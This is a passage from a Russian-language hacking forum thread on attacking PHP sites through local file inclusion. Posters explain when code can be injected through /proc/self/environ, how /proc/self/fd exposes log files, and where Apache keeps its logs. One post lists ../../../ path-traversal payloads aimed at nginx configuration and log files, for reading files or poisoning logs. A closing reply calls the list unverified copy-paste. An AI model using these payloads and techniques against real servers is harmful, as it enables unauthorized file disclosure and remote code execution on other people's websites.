    насколько я понял выполнить код через /proc/self/environ получиться только если php работает как cgi, иначе /proc/self/environ будет указываеть на окружение апача. Проверить легко, если в /proc/self/cmdline что-то вроде
    Code:
    /usr/sbin/apache2�-k�start�
    то php не cgi и код внедрить в /proc/self/environ не получиться.
     
  18. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Небольшое дополнение к материалу предоставленному c411k

    1 На фре это работать не будет. там немного по другому всё устроено и по умолчанию proc/ не используется.

    2 Через пиды искать логи бесполезно, да и не нужно, дело в том, что
    proc/self/
    это как раз ссылка на каталог с данными процесса, а
    proc/self/fd
    в свою очередь дирректория содержащая ссылки на файлы которые использует процесс. Так-что всё проще.

    =============================

    И так-же по дефолтным логам добывлю из своих наблюдений

    На Апаче 2.2.x частенько попадаются директории
    apache22/ т.е.
    и т.д.
     
  19. [х26]VОLАND

    [х26]VОLАND Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    513
    Likes Received:
    756
    Reputations:
    218
    nginx

    *.conf:
    Code:
    ../../../../../../etc/nginx/srv.d/*.conf
    ../../../../../../etc/nginx/nginx.conf
    ../../../../../../usr/local/etc/nginx/nginx.conf
    ../../../../../../usr/local/nginx/conf/nginx.conf
    logs:
    Code:
    ../../../../../../var/log/nginx/access_log
    ../../../../../../var/log/nginx/error_log
    ../../../../../../var/log/nginx/access.log
    ../../../../../../var/log/nginx/error.log
    ../../../../../../var/log/nginx.access_log
    ../../../../../../var/log/nginx.error_log
    
    ../../../../../../logs/access_log
    ../../../../../../logs/error_log
    ../../../../../../logs/access.log
    ../../../../../../logs/error.log
    
    ../../../../../../var/www/<domain.com>/log/nginx.access.log
    ../../../../../../var/www/<domain.com>/log/nginx.error.log
    ../../../../../../var/www/<domain.com>/log/nginx.access_log
    ../../../../../../var/www/<domain.com>/log/nginx.error_log
    
    ../../../../../../var/log/nginx/<domain.com>.access.log
    ../../../../../../var/log/nginx/<domain.com>.error.log
    ../../../../../../var/log/nginx/<domain.com>_access.log
    ../../../../../../var/log/nginx/<domain.com>_error.log
     
  20. ShAnKaR

    ShAnKaR Пачка маргарина

    Joined:
    14 Jul 2005
    Messages:
    904
    Likes Received:
    297
    Reputations:
    553
    не надо так чистить, копипаст непроверенный )